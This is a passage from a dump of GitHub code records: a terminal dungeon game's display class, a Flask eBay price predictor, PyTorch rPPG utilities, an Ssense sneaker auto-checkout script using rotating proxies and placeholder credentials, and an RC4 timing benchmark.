del data_sim\n gc.collect()\n ls.close()\nexit()\n\n","repo_name":"aarjaneiro/RedundancyPaper","sub_path":"Analysis/hsic_module.py","file_name":"hsic_module.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9295465762","text":"import os\nimport platform\n\n\nclass View:\n \"\"\"\n This Class handles every console input/output of the game\n and passes it to forward to controller.\n This Class exists to isolate the disorder of long strings and prints\n from other classes, to keep every other class as clean as possible.\n \"\"\"\n\n welcome_menu = [\"Welcome to... 
DUNGEON RUN!\",\n \"[1] New Character\",\n \"[2] Load Character\",\n \"[3] Load AI Character\",\n \"[4] Highest score\",\n \"[5] Quit\"]\n\n start_location = [\"Choose your starting location:\",\n \"[1] North-West\",\n \"[2] North-East\",\n \"[3] South-West\",\n \"[4] South-East\"]\n\n choose_role = [\"Please choose your role:\",\n \"[1] Knight\",\n \"[2] Wizard\",\n \"[3] Thief\"]\n\n choose_size = [\"Please choose your mapsize:\",\n \"[1] 4x4\",\n \"[2] 5x5\",\n \"[3] 8x8\"]\n\n choose_AI = [\"Please choose AI:\",\n \"[1] AI Knight\",\n \"[2] AI Wizard\",\n \"[3] AI Thief\"]\n\n highscore = [\"Display highscore:\",\n \"number 1 is me\",\n \"number 2 is you\",\n \"number 3 is some other dude\"]\n\n player_load_stats = [\"---- Stats for loaded player ----\", # 0\n \"Total runs: \", # 2\n \"\", # 3\n \"- Monsters killed -\", # 4\n \"Giant Spiders: \", # 5\n \"Skeletons: \", # 6\n \"Orcs: \", # 7\n \"Trolls: \", # 8\n \"\", # 9\n \"Treasures collected: \", # 1\n \"Accumulated score: \", # 10\n \"\", #11\n \"Enter to start game\"] #12\n\n choose_corner = [\"Choose your starting location:\",\n \"[1] North-West\",\n \"[2] North-East\",\n \"[3] South-West\",\n \"[4] South-East\"]\n\n direction_option = [\" [N] North \",\n \"[W] West [E] East\",\n \" [S] South \"]\n\n attack_options = [\"[1] Attack!\",\n \"[2] Flee!\"]\n\n leave_options = [\"[1] Yes\",\n \"[2] No\"]\n\n good_bye = [\"Thanks for playing!\", \"\", \"/Sonsofbjorn\"]\n\n enter_go_back = [\"\", \"\", \"[ENTER] to return.\"]\n\n stats_count = [\"\", \"---- Killed Monsters ----\",\n \"Giant Spider: \",\n \"Skeletons: \",\n \"Orcs: \",\n \"Troll: \",\n \"\",\n \"Tresure count: \", \"Total Score: \", \"\", \"\", \"\"]\n\n enter_char_name = [\"\", \"Enter character name: \", \"\", \"\", \"\", \"\", \"\", \"Type 'back' to return\"]\n\n leave_question = [\"You see a staircaise,\", \"do you want to leave?\"]\n\n show_monsters = [\"Uhuh! ENEMIES! You see the following foes: \"]\n\n player_is_dead = [\"\", \"Character has died and cannot be played!\"]\n score_text = [\"Your current score is: \"]\n loot_text = [\"You found loot! 
The following loot was added to your backback: \"]\n player_dead = [\"You have been slained by the\"]\n player_killed = [\"You have slain the \"]\n player_escaped = [\"You have escaped!\"]\n player_failed_escape = [\"You have failed to escape!\"]\n player_hit = [\"You hit the\"]\n monster_hit = [\"You have been hit by the\"]\n for_one_dmg = [\"for 1 damage\"]\n player_miss = [\"You missed\"]\n monster_miss = [\"Missed!\"]\n player_crit = [\" You did a critical hit to \"]\n shield_block = [\"Your shield blocked the attack from \"]\n hit = [\" hit \"]\n you_died = [\"You have died!\", \"All your loot this round was lost\", \"and not added to your highscore\", \"\", \"[ENTER] to return\"]\n exit_score = [\"The score has been added to your highscore!\"]\n\n \"\"\" ERROR MESESAGES BELLOW \"\"\"\n error_msg = []\n err_choice = [\"\", \"Invalid choice!\"]\n err_long_name = [\"\", \"Max 18 characters!\"]\n err_invalid_char = [\"\", \"Invalid character ','\"]\n err_player_exists = [\"\", \"Player name is taken\"]\n err_player_not_exist = [\"\", \"Player does not exist\"]\n err_load_error = [\"\", \"Load error, ask Micke\"]\n \"\"\" END OF ERROR MESSAGES\"\"\"\n\n \"\"\" COLOR DICTIONARY BELOW\"\"\"\n colors = {\n \"red\": \"\\033[31m\",\n \"green\": \"\\033[32m\",\n \"yellow\": \"\\033[33m\"\n }\n\n def clear_console(self):\n if platform.system() == \"Linux\":\n return os.system('clear')\n if platform.system() == \"Darwin\":\n return os.system('clear')\n elif platform.system() == \"Windows\":\n return os.system('cls')\n\n def draw_map(self, player, dungeon):\n \"\"\"\n This takes in player and dungeon object\n Returns a list with the map and player loc\n \"\"\"\n output = []\n outrow = \"\"\n for row in dungeon:\n for n in range(3):\n for room in row:\n if room.position == player.show_location:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n elif n == 1:\n out = \"░░╳░░░\"\n else:\n out = \"░░░░░░\"\n elif room.has_exit and room.is_dark is False:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n if n == 1:\n out = \"░EXIT░\"\n else:\n out = \"░░░░░░\"\n elif not room.is_dark and len(room.get_room_monsters()) > 0:\n if n == 0 and len(room.get_room_monsters()) > 1:\n out = \"░M░░░░\"\n elif n == 0 and len(room.get_room_monsters()) == 1:\n out = \"░m░░░░\"\n else:\n out = \"░░░░░░\"\n elif room.is_dark:\n out = \"▓▓▓▓▓▓\"\n else:\n out = \"░░░░░░\"\n outrow += out\n output.append(outrow)\n outrow = \"\"\n return output\n\n def print_main_menu(self, input_menu, *args, **kwargs):\n \"\"\"\n Prints main menu, takes in *args which can be list, or strings and\n will be printed as the menu.\n **kwargs is a keyword argument if you want to show extra information,\n you will then send in an extra string/list.\n \"\"\"\n self.clear_console()\n print(\"\\033[31m\"+\"______ \".center(os.get_terminal_size().columns))\n print(\"| _ \\ \".center(os.get_terminal_size().columns))\n print(\"| | | | _ _ _ __ __ _ ___ ___ _ __ _ __ _ _ _ __ \".center(os.get_terminal_size().columns))\n print(\"| | | || | | || '_ \\ / _` | / _ \\ / _ \\ | '_ \\ | '__|| | | || '_ \\ \".center(os.get_terminal_size().columns))\n print(\"| |/ / | |_| || | | || (_| || __/| (_) || | | || | | |_| || | | |\".center(os.get_terminal_size().columns))\n print(\"|___/ \\__,_||_| |_| \\__, | \\___| \\___/ |_| |_||_| \\__,_||_| 
|_|\".center(os.get_terminal_size().columns))\n print(\"\\033[32m\"+\" ╔═════════════\\033[31m __/ | \\033[32m══════════════════════════════╗ \".center(os.get_terminal_size().columns+10), end=\"\")\n print(\" ║ \\033[31m|___/\\033[32m ║ \".center(os.get_terminal_size().columns+10))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n\n menu = []\n\n if isinstance(input_menu, str) or not hasattr(input_menu, \"__iter__\"):\n menu.append(input_menu)\n else:\n menu = input_menu.copy()\n\n if kwargs:\n if isinstance(args[0], str) or not hasattr(args[0], \"__iter__\"):\n to_list = list()\n to_list.append(args[0])\n else:\n to_list = args[0]\n menu += to_list\n for row in menu:\n row = (\"║\"+row.center(50)+\"║\")\n print(row.center(os.get_terminal_size().columns))\n\n if len(menu) < 10:\n count = 10 - len(menu)\n for i in range(count):\n hehe1 = (\"║\"+\" \"*50+\"║\")\n print(hehe1.center(os.get_terminal_size().columns))\n print(\"╚══════════════════════════════════════════════════╝\".center(os.get_terminal_size().columns))\n menu = []\n\n def print_game(self, player, dungeon, input_menu, *args, **kwargs):\n \"\"\"\n This prints all the GFX for the game loop.\n Needs player object, dungeon and a menu list. Use *args and **kwargs\n to display extra information addition to the menu list.\n\n *args = an extra list of information we want to display\n **kwargs = is a keyword boolean and should be true if we want to\n show extra info.\n \"\"\"\n\n self.clear_console()\n print(\"{red} ______ \".format(red=self.colors.get(\"red\")).center(os.get_terminal_size().columns+5))\n print(\"| _ \\ \".center(os.get_terminal_size().columns))\n print(\"| | | | _ _ _ __ __ _ ___ ___ _ __ _ __ _ _ _ __ \".center(os.get_terminal_size().columns))\n print(\"| | | || | | || '_ \\ / _` | / _ \\ / _ \\ | '_ \\ | '__|| | | || '_ \\ \".center(os.get_terminal_size().columns))\n print(\"| |/ / | |_| || | | || (_| || __/| (_) || | | || | | |_| || | | |\".center(os.get_terminal_size().columns))\n print(\"|___/ \\__,_||_| |_| \\__, | \\___| \\___/ |_| |_||_| \\__,_||_| |_|\".center(os.get_terminal_size().columns))\n print(\"{green} ╔══════════════════{red} __/ | {green}═══════════════════════════════════╗ \".format(red=self.colors.get(\"red\"), green=self.colors.get(\"green\")).center(os.get_terminal_size().columns+16), end=\"\")\n print(\" ║ {red}|___/{green} ║ \".format(red=self.colors.get(\"red\"), green=self.colors.get(\"green\")).center(os.get_terminal_size().columns+8))\n print(\" ║ MAP m = One monster ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ╳ = YOUR LOCATION M = More than one monster ║ \".center(os.get_terminal_size().columns))\n playerbox = self.print_hp_score_list(player)\n monsterbox = self.print_monster_hp(player)\n playerbox_cursor = 0\n monsterbox_cursor = 0\n dungeonmap = self.draw_map(player, dungeon)\n if len(dungeonmap) < 13:\n for x in range(6):\n if len(player.current_room.monsters) > 0:\n formated_output = (monsterbox[monsterbox_cursor]+\"║\" + \" \" * 60 + \"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns))\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n formated_output = (\"║\" + \" \" * 60 + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor % 
2 == 0:\n print(formated_output.center(os.get_terminal_size().columns+22), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns-22))\n playerbox_cursor += 1\n monsterbox_cursor += 1\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = (monsterbox[monsterbox_cursor] + \"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n elif len(dungeonmap) < 16:\n for x in range(4):\n if len(player.current_room.monsters) > 0:\n formated_output = (monsterbox[monsterbox_cursor]+\"║\" + \" \" * 60 + \"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n else:\n formated_output = (\"║\" + \" \" * 60 + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor % 2 == 0:\n print(formated_output.center(os.get_terminal_size().columns + 22), end=\"\")\n playerbox_cursor += 1\n monsterbox_cursor += 1\n else:\n print(formated_output.center(os.get_terminal_size().columns - 22))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = (monsterbox[monsterbox_cursor]+\"║\"+row.center(60)+\"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n\n elif len(dungeonmap) > 16:\n for row in dungeonmap:\n if playerbox_cursor < 16 and monsterbox_cursor < 8 and len(player.current_room.monsters) > 0:\n row = (monsterbox[monsterbox_cursor]+\"║\"+row.center(60)+\"║\"+playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+20), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns), end=\"\")\n else:\n 
print(row.center(os.get_terminal_size().columns))\n elif playerbox_cursor < 16:\n row = (\"║\" + row.center(60) + \"║\" + playerbox[playerbox_cursor])\n if playerbox_cursor == 6:\n print(row.center(os.get_terminal_size().columns+32), end=\"\")\n elif playerbox_cursor % 2 == 0:\n print(row.center(os.get_terminal_size().columns + 22), end=\"\")\n else:\n print(row.center(os.get_terminal_size().columns - 22))\n else:\n row = (\"║\" + row.center(60) + \"║\")\n print(row.center(os.get_terminal_size().columns))\n monsterbox_cursor += 1\n playerbox_cursor += 1\n if len(dungeonmap) < 13:\n for x in range(6):\n formated_output = (\"║\" + \" \" * 60 + \"║\")\n print(formated_output.center(os.get_terminal_size().columns))\n elif len(dungeonmap) < 16:\n for x in range(5):\n formated_output = (\"║\" + \" \" * 60 + \"║\")\n print(formated_output.center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n print(\"╚════════════════════════════════════════════════════════════╝\".center(os.get_terminal_size().columns))\n print(\" ╔════════════════════════════════════════════════════════════════════════════╗ \".center(os.get_terminal_size().columns))\n print(\" ║ ║ \".center(os.get_terminal_size().columns))\n menu = []\n\n if isinstance(input_menu, str) or not hasattr(input_menu, \"__iter__\"):\n menu.append(input_menu)\n else:\n menu = input_menu.copy()\n\n if kwargs:\n if isinstance(args[0], str) or not hasattr(args[0], \"__iter__\"):\n to_list = list()\n to_list.append(args[0])\n else:\n to_list = args[0]\n menu += to_list\n\n for row in menu:\n row = (\"║\"+row.center(76)+\"║\")\n print(row.center(os.get_terminal_size().columns))\n for i in range(5-len(menu)):\n extralines = (\"║\" + \" \" * 76 + \"║\")\n print(extralines.center(os.get_terminal_size().columns))\n print(\" ╚════════════════════════════════════════════════════════════════════════════╝ \".center(os.get_terminal_size().columns))\n\n def print_hp_score_list(self, player):\n losthp = player.max_hp - int(player.hp)\n hpbar = \"{red}\".format(red=self.colors.get(\"red\"))+(\"▒\"*int(losthp))+\"{green}\".format(green=self.colors.get(\"green\"))+(\"▓\"*int(player.hp))\n hp_score_list = (\" ╔══════════════════╗\",\n \" ║ NAME: ║\",\n \" ║\"+player.name.center(18)+\"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ HP: ║\",\n \" ║\"+hpbar.center(28)+\"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ CLASS: ║\",\n \" ║\"+player.hero_class.center(18) + \"║\",\n \" ╚══════════════════╝\",\n \" ╔══════════════════╗\",\n \" ║ SCORE: ║\",\n \" ║\"+str(player.score).center(18)+\"║\",\n \" ╚══════════════════╝\"\n )\n return hp_score_list\n\n def print_monster_hp(self, player):\n if len(player.current_room.monsters) > 0:\n monster_hp = player.current_room.monsters[0].hp\n monster_max_hp = player.current_room.monsters[0].max_hp\n losthp = int(monster_max_hp) - int(monster_hp)\n hpbar = \"{red}\".format(red=self.colors.get(\"red\"))+(\"▒\" * int(losthp))+\"{green}\".format(green=self.colors.get(\"green\")) + (\"▓\" * int(monster_hp))\n hp_score_list = (\" ╔══════════════════╗ \",\n \" ║ MONSTER: ║ \",\n \" ║\" + player.current_room.monsters[0].unit_type.center(18) + \"║ \",\n \" ╚══════════════════╝ \",\n \" ╔══════════════════╗ \",\n \" ║ MONSTER HP: ║ \",\n \" ║\" + hpbar.center(28) + \"║ \",\n \" ╚══════════════════╝ \"\n )\n else:\n hp_score_list = ()\n return hp_score_list\n\n\n def center_text(self, text):\n 
print(text.center(os.get_terminal_size().columns))\n\n def handle_input(self):\n return input(\"Choice: \".rjust(os.get_terminal_size().columns//2))\n","repo_name":"sonsofbjorn/dungeonrun","sub_path":"game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":24115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72519966245","text":"import numpy as np\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open(r'LGBMmodel.pkl','rb'))\r\n@app.route('/')\r\ndef home():\r\n return render_template('new_ebay.html')\r\n@app.route('/predict',methods=['POST','GET'])\r\ndef predict():\r\n try:\r\n Bid = float(request.form['Bid'])\r\n Bidtime = float(request.form['Bidtime'])\r\n Bidderrate = int(request.form['Bidderrate'])\r\n OpenBid = float(request.form['OpenBid'])\r\n prediction = np.expm1(model.predict([[Bid, Bidtime, Bidderrate, OpenBid]]))\r\n output = round(prediction[0], 2)\r\n if output < 0:\r\n return render_template('new_ebay.html', prediction_texts=\"Cannot sell your Unit\")\r\n else:\r\n return render_template('new_ebay.html', prediction_text='Auction Price for your product will be ₹{}'.format(output))\r\n except ValueError:\r\n return render_template('new_ebay.html', prediction_text=\"Enter your data in numbers only\")\r\n #return(\"Enter integer values only\")\r\n\r\n #return render_template('new 2.html', prediction_text='Auction Price for your product will be ₹{}'.format(output))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n\r\n\r\n\r\n","repo_name":"sreeram1997/EBAY-ONLINE-AUCTION","sub_path":"ebay_auction1.py","file_name":"ebay_auction1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11352021870","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nloss_global_train = []\nloss_global_valid = []\nacc_global_train = []\nacc_global_valid = []\n\n\ndef running_mean_gpu(x, N):\n out = torch.zeros_like(x)\n dim_len = x.size()[1]\n for i in range(0,dim_len):\n if N%2 == 0:\n a, b = i - (N-1)//2, i + (N-1)//2 + 2\n else:\n a, b = i - (N-1)//2, i + (N-1)//2 + 1\n\n #cap indices to min and max indices\n a = max(0, a)\n b = min(dim_len, b)\n out[:,i] = torch.mean(x[:,a:b],axis=1)\n return out\n\n\ndef gpu_CHROM(X):\n Xcomp = 3*X[:,0,:]- 2*X[:,1,:]\n Ycomp = (1.5*X[:,0,:])+X[:,1,:]-(1.5*X[:,2,:])\n sX = torch.std(Xcomp,axis=-1)\n sY = torch.std(Ycomp,axis=-1)\n alpha = (sX/sY)\n alpha = torch.stack([alpha]*64,dim=1)\n bvp = Xcomp-alpha*Ycomp\n #bvp = butter_bandpass(bvp,0.7,3,30,order=3)\n minimo = torch.min(bvp,dim=1)[0]\n massimo = torch.max(bvp,dim=1)[0]\n minimo = torch.stack([minimo]*64,dim=1)\n massimo = torch.stack([massimo]*64,dim=1)\n bvp = (bvp - minimo)/(massimo-minimo)\n bvp = running_mean_gpu(bvp,5)\n return bvp\n\n\ndef raw_rppg(masked):\n num = torch.sum(masked,(3,4))\n denom = torch.count_nonzero(masked,(3,4))\n result = num/denom\n return result\n\n","repo_name":"marukosan93/De-id_rPPG","sub_path":"utils/utils_chrom.py","file_name":"utils_chrom.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43679903868","text":"from bs4 import BeautifulSoup as bs\nimport requests\nfrom fake_useragent import UserAgent\nfrom proxymanager import ProxyManager\nfrom pathlib import 
Path\nimport os\nimport json\nimport random\nimport datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom subprocess import Popen, PIPE\n\nme = \"xxxxxxxxxxxxx@email.com\"\nyou = \"xxxxxxxx@email.com\"\n\nhome = str(Path.home())\ndirpath = os.getcwd()\n\nprint(datetime.datetime.now())\n\n\nua = UserAgent()\nproxy_manager = ProxyManager('{}/proxies.txt'.format(home))\nrandom_proxy = proxy_manager.random_proxy()\nproxies = random_proxy.get_dict()\nprint(proxies)\n\nsession = requests.Session()\nsession.headers = {'User-Agent': ua.random}\n\nproduct_link_list = ['https://www.ssense.com/en-us/men/product/nike/white-off-white-edition-air-presto-sneakers/3625319', 'https://www.ssense.com/en-us/men/product/nike/black-off-white-edition-air-presto-sneakers/3456739', 'https://www.ssense.com/en-us/men/product/yeezy/grey-boost-700-sneakers/3676879', 'https://www.ssense.com/en-us/women/product/yeezy/grey-boost-700-sneakers/3677059', 'https://www.ssense.com/en-us/men/product/y-3/black-futurecraft-runner-4d-ii-sneakers/3131628', 'https://www.ssense.com/en-us/men/product/nike/beige-off-white-edition-the-ten-blazer-mid-sneakers/3685649', 'https://www.ssense.com/en-us/men/product/nikelab/black/3685639d', 'https://www.ssense.com/en-us/men/product/nikelab/orange/3685649']\n\n\ndef get_sizes_in_stock(product_link):\n\tglobal session, proxies\n\tsizes_in_stock = {}\n\tproduct_response = session.get(product_link, proxies=proxies)\n#\twith open('{}/product_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n#\t\tf.write(product_response.text)\n\tsoup = bs(product_response.text, \"html.parser\")\n\toptions = soup.findAll(\"option\")\t\n\tfor option in options:\n\t\tif (\"Sold Out\" not in option.text) and (\"SELECT A SIZE\" not in option.text):\n\t\t\tprint(option['value'])\n\t\t\toption_value = option['value'].split('_')\n\t\t\tsizes_in_stock[option_value[0]] = option_value[1]\n\treturn sizes_in_stock\n\ndef login():\n\tglobal session, proxies\n\n\tlogin_link = 'https://www.ssense.com/en-us/account/login'\n\n\tlogin_load = {\n\t\t\"email\": \"xxxxxxxxx@email.com\",\n\t\t\"password\": \"XXXXXXX\"\n\t}\n\n\tlogin_response = session.post(login_link, data=login_load, proxies=proxies)\n\tprint(login_response.status_code)\n\tprint(login_response.text)\n\ndef empty_shopping_bag():\n\tglobal session, proxies\n\tshopping_bag_link = 'https://www.ssense.com/en-us/shopping-bag.json'\n\tbag_response = session.get(shopping_bag_link, proxies=proxies)\n\tbag_json = json.loads(bag_response.text)\n\tif bag_json[\"cart\"][\"products\"]:\n\t\tfor product in bag_json[\"cart\"][\"products\"]:\n\t\t\tprint(product[\"sku\"])\n\t\t\tsession.delete(\"https://www.ssense.com/en-us/api/shopping-bag/{}\".format(product[\"sku\"]), proxies=proxies)\n\n\n\n\ndef add_to_cart(sizes_in_stock):\n\tglobal session, proxies\n\tsize_chosen = random.choice(list(sizes_in_stock.values()))\n\tprint(size_chosen)\n\n\tcart_load = {\n\t\t\"serviceType\": \"product-details\",\n\t\t\"sku\": size_chosen,\n\t\t\"userId\": \"\"\n\t}\n\n\tcart_link = \"https://www.ssense.com/en-us/api/shopping-bag/\" + size_chosen\n\n\tcart_response = session.post(cart_link, data=cart_load, proxies=proxies)\n\tprint(cart_response.status_code)\n\t#print(cart_response.text)\n\t#with open('{}/cart_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t#\tf.write(cart_response.text)\n\n\n\ndef checkout():\n\tglobal session, proxies\n\n\tcheckout_link = 
'https://www.ssense.com/en-us/checkout'\n\n\tform_response = session.get(checkout_link, proxies=proxies)\n\n\twith open('{}/checkout_form_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t\tf.write(form_response.text)\n\t\n\tform_soup = bs(form_response.text, 'html.parser')\n\n\tCSRTokenId_soup = form_soup.findAll(\"input\", {\"name\": \"CSRFTokenId\"})\n\n\n\t#print(CSRTokenId_soup)\n\tprint(CSRTokenId_soup[0]['value'])\n\tprint(CSRTokenId_soup[0].input['value'])\n\t\n\tdevice_fingerprint_soup = form_soup.findAll(\"input\", {\"name\": \"device_fingerprint\"})\n\tprint(\"Device fingerprint: {}\".format(device_fingerprint_soup[0]['value']))\n\t\n\n\tpayload = {\n\t\t\"CSRFTokenId\": CSRTokenId_soup[0]['value'],\n\t\t\"CSRFTokenValue\": CSRTokenId_soup[0].input['value'],\n\t\t\"shipping_id\": \"\", \n\t\t\"shipping_isnew\": \"1\",\n\t\t\"device_fingerprint\": device_fingerprint_soup[0]['value'],\n\t\t#\"device_fingerprint\": \"2a376561a232f9a8013033653c2099bf\",\n\t\t\"shipping_firstname\": \"xxxxxxx\",\n\t\t\"shipping_lastname\": \"xxxx\",\n\t\t\"shipping_company\": \"\",\n\t\t\"shipping_address\": \"xxxxxxxx\",\n\t\t\"shipping_country\": \"xx\",\n\t\t\"shipping_state\": \"xx\",\n\t\t\"shipping_postalcode\": \"xxxxx\",\n\t\t\"shipping_city\": \"xxxxx\",\n\t\t\"shipping_phone\": \"xxxxxx\",\n\t\t\"shipping_method\": \"43\",\n\t\t\"pccc\": \"\",\n\t\t\"paymentMethod\": \"creditcard\",\n\t\t\"creditcardHolderName\": \"xxxxxx\",\n\t\t\"creditcardNumber\": \"xxxxxxxxxxxxxxxxxxxx\",\n\t\t\"creditcardCVV\": \"xxx\",\n\t\t\"creditCardMonth\": \"xx\",\n\t\t\"creditCardYear\": \"xxxx\",\n\t\t\"sameAsShipping\": \"1\",\n\t\t\"billing_id\": \"\", \n\t\t\"billing_isnew\": \"0\",\n\t\t\"billing_firstname\": \"\",\n\t\t\"billing_lastname\": \"\",\n\t\t\"billing_company\": \"\",\n\t\t\"billing_address\": \"\", \n\t\t\"billing_postalcode\": \"\",\n\t\t\"billing_city\": \"\",\n\t\t\"billing_phone\": \"\"\n\t}\n\n\tcheckout_response = session.post(checkout_link, data=payload, proxies=proxies)\n\n\twith open('{}/checkout_{}.html'.format(dirpath, str(datetime.datetime.now()).replace(' ', '_')), 'w') as f:\n\t\tf.write(checkout_response.text)\n\nsizes_notification = []\n\nfor product_link in product_link_list:\n\tprint(product_link)\n\tsizes_in_stock = get_sizes_in_stock(product_link)\t\n\tprint(sizes_in_stock)\n\tif sizes_in_stock:\n\t\tlogin()\n\t\tempty_shopping_bag()\n\t\tadd_to_cart(sizes_in_stock)\n\t\tcheckout()\n\t\tavailable_sizes = ' '.join(list(sizes_in_stock.keys()))\n\t\tprint(available_sizes)\n\t\tsizes_notification.append(product_link + \"\\n\" + available_sizes + \"\\n\")\n\t\tsizes_notification.append(\"------------------------------------\")\n\n\nif sizes_notification:\n\tmsg = MIMEText('\\n'.join(sizes_notification))\n\t# Create message container - the correct MIME type is multipart/alternative.\n\tmsg['Subject'] = \"Ssense Auto Checkout caught something for you!\"\n\tmsg['From'] = me\n\tmsg['To'] = you\n\tp = Popen([\"/usr/sbin/sendmail\", \"-t\", \"-oi\"], stdin=PIPE, universal_newlines=True)\n\tp.communicate(msg.as_string())\n\nprint(datetime.datetime.now())\n","repo_name":"oe0507llz/ssense-atc-bot","sub_path":"ssense_requests_autocheckout.py","file_name":"ssense_requests_autocheckout.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
{"seq_id":"2292793107","text":"import sys\nimport pyttsx\n\nengine = pyttsx.init()\n\ndef show(*objs):\n\tbegin = '' if '\\r' in 
objs[0] or '\\b' in objs[0] else '\\n'\n\tsys.stdout.write(begin)\n\tfor part in objs:\n\t\tsys.stdout.write(str(part))\n\tsys.stdout.flush()\n\ndef say(speech):\n\t#NOT engine.startLoop()\n\tshow(speech)\n\tengine.say(speech)\n\tengine.runAndWait()\n\nprogress = ['/','-','\\\\','|']\ndef show_progress(i):\n\tshow('\\b \\b', progress[i % len(progress)])\n\n","repo_name":"rolote/solar_radiation_model","sub_path":"imagedownloader/libs/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6232456908","text":"#!/usr/bin/env python\n\nimport string, subprocess, sys, time\nfrom Crypto.Cipher import ARC4\nfrom lib import MyARC4\n\nkey = string.ascii_lowercase\nsizes = [6, 60, 600, 2000, 4000, 6000]\nciphers = [ARC4, MyARC4]\ntimes = {}\nsample_filepath = 'samples/plain_{0}k.txt'\nplt_filepath = 'times.plt'\ndat_filepath = 'times.dat'\n\ndef measure():\n for size in sizes:\n times[size] = {}\n for cipher in ciphers:\n plaintext_file = open(sample_filepath.format(size), 'r')\n start = time.clock()\n cipher.new(key).encrypt(plaintext_file.read())\n times[size][cipher] = time.clock() - start\n plaintext_file.close()\n\ndef write():\n plt_file = open(plt_filepath, 'w')\n plt_file.write('set key left top\\n')\n plt_file.write('set grid\\n')\n plt_file.write('set xrange [0:6500]\\n')\n plt_file.write('plot\\\\\\n')\n for cipher in ciphers:\n plt_file.write(' \"{0}\" using 1:{2} title \"{1}\" with points'.format(dat_filepath, cipher.__name__, ciphers.index(cipher)+2))\n if cipher != ciphers[-1]:\n plt_file.write(',\\\\\\n')\n else:\n plt_file.write('\\n')\n plt_file.write('pause 